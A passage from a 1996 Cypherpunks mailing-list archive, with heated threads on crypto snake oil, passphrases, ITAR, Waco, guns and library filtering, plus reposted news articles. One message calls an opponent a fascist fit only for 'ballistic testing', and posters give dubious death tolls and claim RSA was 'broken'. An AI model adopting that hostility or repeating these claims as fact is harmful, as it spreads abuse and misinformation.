Date: Mon, 22 Jul 1996 01:26:31 +0800
To: devnull@manifold.algebra.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
In-Reply-To: <BZ3eRD17w165w@bwalk.dm.com>
Message-ID: <199607211513.KAA14942@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> Llywarch Hen <ecgwulf@worldnet.att.net> writes:
> >                                                               25 mil under
> > Mao, 8 mil under Hitler, and so on.
> 
> I'm not sure where you got these figures... Hitler had 12 million people
> killed in death camps alone, about half of whom were Jews. I've heard estimates
> of 100 mil killed during the cultural revolution alone. This doesn't even
> begin to include the _war dead, which would be relevant to your thread.
> 
> As for historical parallels, these guys were pussies compared to the
> Mongol invasions, or for that matter Roman conquests.

In Iran, Chenghis Khan killed 30 millions out of 40 who previously
lived there.

It basically proves that people now are no better and no worse than 
people then. Really, there is no reason for things to be otherwise.

Similarly, I do not uderstand why futurists paint so rosy pictures of
the 21st century. I think that it will be at least just as full of shit
as this one.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Mon, 22 Jul 1996 03:51:05 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <Pine.LNX.3.94.960721055512.264A-100000@switch.sp.org>
Message-ID: <Pine.BSI.3.93.960721102200.7735A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Agreed... but there should be mention of stuff like "Here's our new
cryptosystem, try and crack it. If you do, we'll give you the software
free," or "here's a big block of ciphertext we encrypted with our
proprietary algorithm which we won't describe, try and crack it, but
it is unbreakable, however if you do crack it you win a free trip
to visit us."

Distinguishing what sounds to be a real contest and what sounds like a 
marketing gimmick would be good.

On Sun, 21 Jul 1996, The Deviant wrote:

> > 
> > Be wary of marketing gimmicks related to "if you can crack our
> > software" contests.  
> > 
> 
> Even the best cryptographers and security professionals have done this.
> RSA did it with their Public Key system, which took 20+ years to break.
> Throughout history, many security mechanisms, even the best ones,
> including Cyphers, Locks, Firewalls, etc. have been known to go as far as
> to offer prizes (some extremely high, upwards of a million dollars, some
> as low as RSA's famous $100 prize)
> 
> I think that this one really is just a bit too broad.
> 
>  --Deviant
> 

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfJpFy/fy+vkqMxNAQEq3gP+MKgGjr/hW/IFnl4SDchCPyqy/MwXWjLj
LSW+p7BoZJBNcYuK9HhPAH2myKGnXsGfVSAayV6ldTVToQDVsDKBsmFiAc8ONL4y
wDMwAp/S69D8kJWRPODMyUbmBZH5cCSxB65/lN4sm/PIbByF/323w8axX0Q2/WTZ
30bnSBr3ep0=
=srzc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seth Oestreicher <setho@westnet.com>
Date: Mon, 22 Jul 1996 00:49:41 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: American People the relation to the Police
Message-ID: <1.5.4.32.19960721143242.00912b24@westnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 AM 7/21/96 +0600, you wrote:
>At 08:56 20/07/96 -0400, you wrote:
>> Why
>>is foreign aid allowed to continue when it is not allowed by the
>>Constitution?  (I could go on and on.....)  
>
>Isn't there a gap between "not allowed" and "disallowed"? The
>Constitution couldn't possibly have foreseen the problems of
>today, and the global role the US plays (or seeks to).
>Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
>http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key


That's like saying the Bible is outdated because it was written several
thousand years ago.  If the law must change debate it, vote on it, and
implement it.  Don't circumvent it!  I mean should we take away free speech
because more people lie today than ever before in history?  Or should we
take away our religous rights because of the David Koresh's of the world?
Should we take away the guns of the people because less than 30,000 people a
year die of gunfire?  (less than .01% of the nation!)  Should we take away
the double jeopardy clause just because O.J. Simpson *IS* guilty?

Seth





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Jul 1996 03:45:54 +0800
To: "Chris Adams" <alanh@infi.net>
Subject: Re: pledge status
Message-ID: <199607211738.KAA02888@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:09 AM 7/21/96 -0800, Chris Adams wrote:
>On 20 Jul 96 23:12:20 -0800, alanh@infi.net wrote:
>>I think this has relevance to the
>>black-ninjas-pretending-that-they're-in-a-Hollywood-script thread about
>>cops making unanounced search warrant services at 4am. 
>>
>>I have tremendous admiration for my local LEO's.  It's the federales that 
>>are the problem, usually.

>I'm thinking of Waco, where, I've heard, more experienced SWAT-types
>tried to talk their bosses out of a certain infamous mistake...

Subsequent to the initial Waco raid, the government was claiming that the 
Davidians were "ready" for them.  I think it was easy to tell that this was 
a lie:  Had they actually been READY, far more than 4 agents would have been 
dead.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 03:56:45 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007603ae16956a64e2@[192.187.162.15]>
Message-ID: <v03007613ae18199394c5@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 AM -0700 7/21/96, Robert A. Hayden wrote:

>The purpose of a librarian is to aid patrons in locating
>materials and to maintain the order of the library.  The Library Bill of
>Rights (which, of course, legally means nothing) guarantees access to any
>materials by any patron.  If little eight year old Johnny Doe comes and
>asks for _The Joy of Gay Sex_, a librarian is supposed to do nothing more
>that point Johnny to the "J" section.

Not in the cities I'm familiar with. And so to do would be wrong, in my
view. In fact, library children's programs do a LOT more than simply aiding
patrons in locating materials and maintaining the order of the library, so
your contention is false on its face.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 22 Jul 1996 04:06:13 +0800
To: Seth Oestreicher <amehta@giasdl01.vsnl.net.in>
Subject: Re: American People the relation to the Police
In-Reply-To: <1.5.4.32.19960721143242.00912b24@westnet.com>
Message-ID: <v03007614ae181d567764@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:32 AM -0700 7/21/96, Seth Oestreicher wrote:

>should we
>take away our religous rights because of the David Koresh's of the world?

I know lots of people who would like to take away the Religious Right. :-)

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 03:13:40 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Surf-filter lists
In-Reply-To: <199607191810.LAA07845@netcom9.netcom.com>
Message-ID: <Pine.LNX.3.93.960721111037.2945B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, Vladimir Z. Nuri wrote:
> agree with most of your points CL, but
> frankly I think
> that's what childhood is all about: not being exposed to all the
> harsh aspects that grownups call "reality". do we ask that children

     I thought it was in large part learning to be a grown-up.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 22 Jul 1996 04:44:05 +0800
To: cypherpunks@toad.com
Subject: Re: Length of passphrase beneficial?
In-Reply-To: <2.2.32.19960721172615.006e6a64@mail.sd.cybernex.net>
Message-ID: <Pine.SUN.3.92.960721111918.11352A-100000@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jul 1996, Erle Greer wrote:
[snip]
> I have a 2048-bit PgP key and pseudorandom a/n character
> generator, from which I chose a large passphrase similar to:
>
> f4VnI1G1mGcwTZ1vGoyPwN4NLojF8Ee9ff1aicOGn87x0nwwHhJUo6XSYKEawRne
> (Yes, cut-n-paste, but my only in-house threat is my wife.)

Ugh.  Erle, you might want to check out the Diceware method for generating
passphrases.  It lets you generate a lengthy passphrase that is random and
that you might actually be able to remember :)

I don't have a URL handy, but if you go to Altavista and search for
"diceware" you should find it...  It might be indexed at Yahoo, too...

> Actual Question:
> Does the length and randomness of a passphrase contribute at all
> to the overall security of a cryptosystem?

Actual short answer: yes :)

Look for the passphrase FAQ, for a better explanation than I can give...

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Mon, 22 Jul 1996 04:51:38 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
In-Reply-To: <Pine.LNX.3.94.960721055512.264A-100000@switch.sp.org>
Message-ID: <m2afwttq1p.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Deviant" == The Deviant <deviant@pooh-corner.com> writes:

> On Sat, 20 Jul 1996, Deranged Mutant wrote:

>> Subject: A Snake-Oil FAQ
>> 
>> Be wary of marketing gimmicks related to "if you can crack our
>> software" contests.  

Deviant> I think that this one really is just a bit too broad.

Not really.  What about the `unbreakable OTP' system challenge that
went through this list a couple of months ago?  ``Break our algorithm,
and we sell you the company for $1''.  The algorithm was broken, and
the vendor slithered away never to be heard from again (but did not
sell the worthless company).

It's a good metric.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 03:45:09 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760eae159927b241@[192.187.162.15]>
Message-ID: <Pine.LNX.3.93.960721112708.2945C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, David Sternlight wrote:
> At 1:47 AM -0700 7/19/96, Cerridwyn Llewyellyn wrote:
> >Allow the government to think that we think it has the right to give
> >us their permission and we've lost everything.  The government should
> >need OUR permission, not the other way 'round.
> That's what happened, or didn't you notice that ITAR is based on laws
> passed by an elected Congress? Didn't you notice that thus far when people
> with one position on the matter have tried to persuade Congress to modify
> ITAR, they have failed? This is a (as far as it goes) a democracy, not a
> 'Llewyellyn and those who agree with him' dictatorship.

     I pledge allegience to this flag and THE REPUBLIC for which it stands.

     REPUBLIC, GET IT? Rule by LAW as opposed to the tyranny of STUPIDITY 
called democracy.
     ITAR _may_ be based on laws passed by congress, but since the NSA has
yet to try the ITAR in court, and only uses it to threaten business with,
we don't know how the courts will interpret these rules, much less the laws
that give UNELECTED OFFICIALS the authority to make LAWS. 

    Yer an idiot. Not just for what you wrote above, but for just about 
everything you've said since you started posting. I had never read any 
of your writings before, and they seemed rational so I was inclined to 
give you a chance, even tho' I disagreed with you. 

    You have proben yourself to be a facist, and AFAIC there is only 1 
use for a facist. Ballistic testing.

     Yes, I do know what a facist is, and no, I am not comparing you to
The leader of Germany during WWII. 
 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 22 Jul 1996 03:44:51 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn Unannounced  Ninja Raids)
In-Reply-To: <199607192139.OAA23712@server1.chromatic.com>
Message-ID: <Pine.LNX.3.93.960721114117.2945F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, Ernest Hua wrote:
> 
> Would you just hand out guns to all teenagers?


     I was 17 when Uncle Shithead handed me my first M-16, and I wasn't 
the youngest person in my company.

> No where in this list of high priority items is respect for human life,

     I'm in my late 20's, and respect for human life is lower than ever.

> Incidentally, if you are interested, I DO have a child (almost 2 yrs),
> and I certainly would not even contemplate letting him have a gun (no
> matter how well he can use it) until he can legal get one himself.  I
> will certainly invoke serious wrath (on him and anyone else involved)
> if I ever found him with a gun.


     Yes, those guns are evil things. Evil I tell you, constantly shooting
people for no reason, going off half-cocked and whooping it up all by 
their polished oiled ol selves.

     Isn't it funny how otherwise rational people can ascribe intentions
and moral alignement (ie. good/evil) to an inert chunk of steel?

> 
> By the way, would you let a 6 year old drive?  or fly?  (Assuming that
> they are physical capable and trained to do such.)

     I was driving tractors(small ones) and motorcycles long before I 
turned 16. My father started teaching me to drive a car (thru asking 
questions &etc.) when I was about 12, and put me behind the wheel of 
a van when I was 15 (in a controled situation away from traffic). 

     He also taught me the basics of gun saftey, and made sure that
I took those classes that were available to me in the areas of gun 
saftey and marksmanship. 

   Then again for all his faults my father is a relatively rational 
human being about most things. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 22 Jul 1996 02:58:20 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007602ae17f7879532@[192.187.162.15]>
Message-ID: <199607211702.MAA15624@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


David Sternlight wrote:
> >As a native Bostonian, I have to tell you that the original "Tree of
> >Liberty" was cut down many many years ago and in it's place now stands a
> >storefront, if you look up onto the second floor you will notice a frieze
> >of a tree. This is all that stands to commemerate the "Tree of Liberty".
> >
> >oh btw that storefront is in the comabat zone of boston, and the last time
> >I checked that  store was called either the "Naked I"or the "Pussycat
> >lounge", can you guess what they sell?
> 
> This is too good to pass up. The modern version, then is:
> "The tree of liberty must be titillated with the money of sex-seekers."

But of course.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Mon, 22 Jul 1996 05:32:02 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <m27mrxtojl.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Jeff" == Jeff Weinstein <jsw@netscape.com> writes:

Jeff>   Well yes, the first time they do it.  But the many times they
Jeff> download new versions, from now until the end of time, they can
                                            ^^^^^^^^^^^^^^^
Jeff> use 128-bit SSL.

The world is ending September 17, 1996 I presume?  ;-)

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 21 Jul 1996 22:29:52 +0800
To: cypherpunks@toad.com
Subject: Devil's Bargain
Message-ID: <199607211209.MAA05035@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, July 21, 1996, WIR, p. 5. 
 
 
   The Devil's Bargain of a Better World 
 
   By Tim Weiner 
 
 
   Washington. The arc of the burning plane falling into the 
   ocean, the fire glowing on the dark waters, shed light on 
   how vulnerable we are. When a jumbo jet falls from the sky, 
   technology has failed or terrorism has succeeded. 
 
   In the hours after Flight 800 went down off Fire Island, 
   everyone in officialdom said there was no reason to believe 
   it was a terrorist attack. Nearly everyone else 
   instinctively believed it was. 
 
   However the facts turn out, it is revealing that Americans 
   thought first of a bomb borne by angry men on a mission 
   from God. There was no more evidence to blame it on it was 
   close enough to truth, given the absence of facts, 
   Americans' shared fear of terror and their faith in 
   technology. 
 
   In any event, if the crash turns out to have been an 
   accident -- horrible but still an act of God -- the relief 
   may be fleeting. 
 
   "It doesn't matter whether it was a bomb or not, in the way 
   we think of it -- it's what we expect," said Ronald Steel, 
   professor of International relations at the University of 
   Southern California and author of "Temptations of a 
   Superpower" (Harvard, 1995). "We know it's going to happen 
   somewhere --if not this airplane, then the World Trade 
   Center, Lockerbie, the bombs in Saudi Arabia and Paris and 
   London. This is a part of our life. If for some reason this 
   wasn't a bomb, we better get ready for one tomorrow." [See 
   Steel's NYT Op-Ed today: http://jya.com/rsteel.txt.] 
 
   High-Tech Freedom 
 
   With the doubled-edge sword of technology, Americans have 
   carved a world of gleaming aircraft and guided missiles. 
   The airplanes that transport them, the cell phones and 
   television cables and computers that link them, define how 
   they live, how they work, how they take their pleasure. 
   They are right up there with freedom of speech and 
   religion, freedom from want and fear. They make America 
   rich, powerful, and free. 
 
   But Americans cannot control technology; increasingly, it 
   controls them. And when the people Americans fear get their 
   hands on it, the fear is accelerated and amplified by 500 
   channels of interwoven media hype. 
 
   The airlines and telephones and E-mail that connect 
   Americans connect those other people too: a computer disk 
   is the crucial piece of evidence in the current trial of 
   Ramzi Ahmed Yusef, accused of planning to blow a fleet of 
   commercial planes from the sky (and in a pending case, of 
   leading the World Trade Center bombing). 
 
   The subway rider poisoned in Tokyo and the American soldier 
   blown out of bed in Dhahran share a common knowledge: High 
   technology may make a fine sword, but it is a flawed 
   shield. It cannot stop every nut with a grudge. 
 
   Americans are slowly getting used to the idea that one can 
   no longer go through the world without passing through 
   security. They are learning to live with terror and the 
   technology of counter-terrorism, as people have for years 
   in Tel Aviv and Cairo, Belfast and Berlin, Karachi and 
   Algiers. They all visit those cities now; they enter them 
   every time they walk through a metal detector. 
 
   So life feels more and more like an international airport: 
   identity checkpoints and security zones in concrete and 
   glass buildings, pretty flowers planted in concrete 
   barricades outside, robot voices delivering warnings. 
 
   The fear means they arrive early to spend more down time 
   waiting in line to pass through security. So they adapt, 
   thinking: That's not a barricade, it's a flowerpot. They 
   give up a little freedom in exchange for feeling safe, "all 
   watched over," as the late poet Richard Brautigan wrote, 
   "by machines of loving grace." 
 
   Visitors 
 
   The people who hate, love, envy and fear America's 
   prosperity and power, also pass through that international 
   airport. The United States needs their oil for fuel; it 
   needs their sweat for work Americans don't do any more. 
   They are woven into America, traveling through open lines 
   of trade and telecommunications and technology. 
 
   So everybody learns to live with the fear of the bomb in 
   the cargo bay: you have to catch that plane if you have 
   business abroad. If the United States were determined to 
   buy machines that could sniff out the Semtex in the 
   boombox, it could have done it -- the cost is perhaps $2 
   billion, or slightly less than one Stealth nuclear bomber. 
   But that is not the war Washington prepared to fight after 
   Vietnam. Generals today want wars they are sure to win. 
 
   We -- the United States -- have the smart bombs, built with 
   the billions that bankrupted Moscow and made America Number 
   One. They -- the furious and the powerless -- have the dumb 
   bombs, made from fertilizer and fuel oil, ignited by rage 
   and religion. But the United States can't stop them all, 
   not with its ever-tightening laws, not with its trillion- 
   dollar military, not with its weapons and warheads. So the 
   thinking goes. 
 
   On the simplest level, terrorism works: it terrifies. It 
   can increase the technology of control and erode the edges 
   of the Constitution. That can fuel the fear of Big Brother, 
   make people paranoid -- and in turn promote the homegrown 
   madness that exploded last year in Oklahoma City. Terrorism 
   cannot destroy the United States, but it has the power to 
   wound, outrage, sadden and change it. 
 
   When Iranians took Americans hostage and controlled the 
   nation's politics from half a world away, when a suicide 
   bomber blew up 241 American soldiers in Beirut and drove 
   the Marines from Lebanon, when the World Trade Center 
   shook, when the Dhahran barracks went up in smoke, it 
   expressed a burning anger in the world, the anger of the 
   poor and the powerless and the God-mad and the stateless. 
 
   The Method 
 
   Through repetition, Americans are slowly coming to 
   recognize the method in this madness: These attacks are 
   meant as blows against the global dominance of American 
   culture, money, power and technology. 
 
   Mr. Steel says the United States' stature as the one 
   surviving superpower and the architect of the new world 
   order is the very thing that makes it a target. 
 
   "Terror," he says, "is the weapon that the powerless use 
   against the powerful. We don't have any conception of what 
   an ideologically threatening power we are to people who 
   have different beliefs. Globalization and modernization are 
   truly threatening to people. They're even threatening to 
   the working class in this country because they drive down 
   wages. The very faith in technology that we spread is 
   something that runs head-on into another faith based on 
   tradition, asceticism and authority. We're the alien 
   ideology now." 
 
   [End] 
 
---------- 
 
   The New York Times, July 21, 1996, p. 25. 
 
 
   Top F.B.I. Investigator Is Known for Bluntness 
 
   James K. Kallstrom the head of the Federal Bureau of 
   Investigation s New York City office, is a technical wizard 
   who has bugged, wiretapped and generally bedeviled 
   mobsters, terrorists and other criminals for more than two 
   decades. 
 
   The crash investigation is the first major, high-profile 
   investigation of Mr. Kallstrom's tenure of a year and a 
   half. Since Wednesday night, Mr. Kallstrom has spent most 
   of his time shuttling, in a Blackhawk military helicopter, 
   between the F.B.I. command center, at 26 Federal Plaza in 
   Lower Manhattan, and the crash site, where he has held two 
   press conferences a day with a top official of the National 
   Transportation Safety Board. 
 
   Mr. Kallstrom is known for a no-nonsense, blunt approach 
   with his colleagues. He also never passes up a chance to 
   express some strongly felt opinions, they say. Often, Mr. 
   Kallstrom has offered his long-held view that Congress is 
   not doing enough to help Federal law enforcement in its 
   fight against criminals who use new technologies, such as 
   the Internet. 
 
   Since the crash Wednesday night, Mr. Kallstrom has had a 
   strong suspicion that it was tied to a bomb or missile. 
   "You have a lot of things that look like terrorism," Mr. 
   Kallstrom said at a press conference Friday afternoon. "At 
   some point in time, we're going to reach critical mass and 
   then we're going to be prepared to say exactly what we 
   think it is." As late as last night, he said he had not 
   seen anything to make him change that opinion. But 
   publicly, at least, Mr. Kallstrom has been reluctant to 
   declare that the crash was caused by a bomb or missile 
   until physical evidence, enough to reach a "beyond a 
   reasonable doubt" threshold, is found. 
 
   By selecting Mr. Kallstrom as assistant director in charge 
   of the New York Office in February 1995, the F.B.I. 
   Director, Louis J. Freeh, chose one of the bureau's most 
   respected surveillance experts, a man whose techniques 
   played a critical role in the arrests of every major 
   organized crime leader and terrorist in New York in the 
   last 20 years, including those involved with the World 
   Trade Center bombing in 1993. 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 23 Jul 1996 04:40:34 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007603ae16956a64e2@[192.187.162.15]>
Message-ID: <Pine.ULT.3.91.960721121811.2901A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 20 Jul 1996, David Sternlight wrote:

> That is also false in its implications. Librarians are in loco parentis,
> and most libraries are VERY careful about what materials young children are
> exposed to and what is more, are responsive to community pressure in the
> matter since most libraries are community-based. Again you have seized on
> the details of an example to act as if it were the argument itself, and
> nit-picked. My core point remains unrefuted.

Uh, wait a second.  Libraries and Librarians are not acting in loco 
parentis.  The purpose of a librarian is to aid patrons in locating 
materials and to maintain the order of the library.  The Library Bill of 
Rights (which, of course, legally means nothing) guarantees access to any 
materials by any patron.  If little eight year old Johnny Doe comes and 
asks for _The Joy of Gay Sex_, a librarian is supposed to do nothing more 
that point Johnny to the "J" section.

Now, I am generalizing as SOME librarian do refuse to check materials some
might feel inappropriate, but that is not a librarian policy.  The Library
Establishment (ALA, basicly) believes in the idea that it is the parents
that should be responsible for what Little Johnny reads, not the
librarian. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMfJLmjokqlyVGmCFAQFGLwP/YCz5RNWunZnDlEXIUaiWyyKtQWkY1eFo
H6ztprN9u8natpFQPn9beRq0QyV3g54gkGUvNKs2jh34caCRpaAbv4dajXSBE9Jy
VzdryDZFhUsNATGJ+Vz8S8v/mFXBLr9Duni41llElzNj8RQDKWx2m4tbquaLiz/L
Lo5hBJBXkcI=
=G65B
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GED/J d-- s:++>: a- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Mon, 22 Jul 1996 03:35:40 +0800
To: cypherpunks@toad.com
Subject: Length of passphrase beneficial?
Message-ID: <2.2.32.19960721172615.006e6a64@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Feel free to skip to 'Actual Question:' below.

I am one to succumb to the assumed benefits of overkill.  I like
the fact that everyone's use of crypto can cause each
individual transmission to become less suspicious to prying
eyes.  I would love knowing that the govt. spent billions of CPU
cycles on one of my transmissions only to find my softball
schedule.  We could lure them by making our subject lines
'Fertilizer-Bomb Recipe' or 'CHILDPORN.GIF Attached', not
condoning either, of course.

I have a 2048-bit PgP key and pseudorandom a/n character
generator, from which I chose a large passphrase similar to:

f4VnI1G1mGcwTZ1vGoyPwN4NLojF8Ee9ff1aicOGn87x0nwwHhJUo6XSYKEawRne
(Yes, cut-n-paste, but my only in-house threat is my wife.)

Actual Question:
Does the length and randomness of a passphrase contribute at all
to the overall security of a cryptosystem?

Thanks in advance!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMfJn0HychImXHmeJAQFpeQf/cLkFsELVEOquVseK7m6Ze+R1zFzkrM8G
T8M4NTdoOALSQKY5Xjj/YHPt9iGY28U5FAPJt/v77YFsewiLxskcJn5fd6G2wX2j
gneSXat0ExIMdLkUuIFDZl2tUny7bBgj2AimIK2Pd0BVlYT8RXPaDhpeWjmHKZpg
vbZaS4yuSSFBy8oucfjO7ivShcraRwIG0Rq6/GCXuhT6Oi0EOaCUWJ+ofYVSqMkb
Jsz9ElMVVVFc+caPwYn5mSVy8Xj3u9UxKOPPoXOpEpJ3gGPsuoiemcwcB/F1VQ34
+uC1YtdndAAu5jRU5JCWYbqYA+BiWY4K/vl9jaJ29BKjLiVfKrU+wA==
=W00K
-----END PGP SIGNATURE-----
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 22 Jul 1996 06:10:38 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007606ae17fd2ce8bd@[192.187.162.15]>
Message-ID: <199607211931.MAA23264@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight <SternPutz@Troll.com> spews forth:

 > The above suggests your mind is closed. I'm going to
 > respond once for the benefit of other readers before
 > plonking you. Feel free to e-mail me if you really want a
 > discussion and not just to hear yourself talk.

How many gigs is the legendary SternBot Killfile by now?  Do you
use a RAID array?

 > This is a massive evasion. I referred to librarians'
 > traditional role in managing children's reading.

Librarians have no role to "manage" anyones reading.  They are
there to assist patrons in locating the materials of their
choice. The Library "Bill of Rights" does not specify ANY age
limits for services provided to library patrons.

 > Further, librarians often observe what children are reading
 > and try to gently guide them--mostly informed by the child's
 > tastes but also with a certain "keep them out of hot water"
 > flavor.

Again, librarians have better things to do than to peep over the
shoulders of library patrons.  Even tiny library patrons.

 > We're not talking about "young adults" here. It's been
 > clear from my comments from the beginning that I was
 > talking about young children. Piaget didn't do all that much
 > with teen-agers.

You are the one who mentioned Piaget.  Had you read my original
message accurately, you would have seen that unlimited access to
information was recommended once persons had entered their
teenage years.  There was no suggestion that very young children
should be given access to material they might find disturbing.

 > This has to do with attempted censorship of what adults may
 > read, and is totally off-topic.

No, actually it has to do with attempts by parents and religious
agitators to control what young people may see in a library, like
taking "Playboy" off the periodical rack, for instance, and
requiring it to be signed out from behind the counter by those
over 18.  Such attempts have increased in number in recent years,
and some have actually been successful.

 > More than that, you conceded that the constraints should be
 > tailored to the age of the child (or at least what could be
 > observed about the child's maturity). That was my only point
 > and one with which you at first disagreed. Reread your
 > post--you are really blind to your own prejudices about my
 > posts.

Stating that very young children may require some guidance in
their choice of reading and viewing material is not a statement
that older minors should also be interfered with in this regard.
Your suggestion that this is implied because it is an example of
tailoring material to age, of which the first is also an example,
is a clear case of incorrect abstraction from the general to the
specific.

 >> Parse the sentence again.  What it says is that although
 >> "protecting children" is often the excuse used to limit
 >> older childrens' access to controversial material, the
 >> reality is that it is usually an effort to control their
 >> thinking on certain issues by making sure they have only one
 >> viewpoint, that of their parents.

 > Reread your own sentence (which I note you don't quote). It
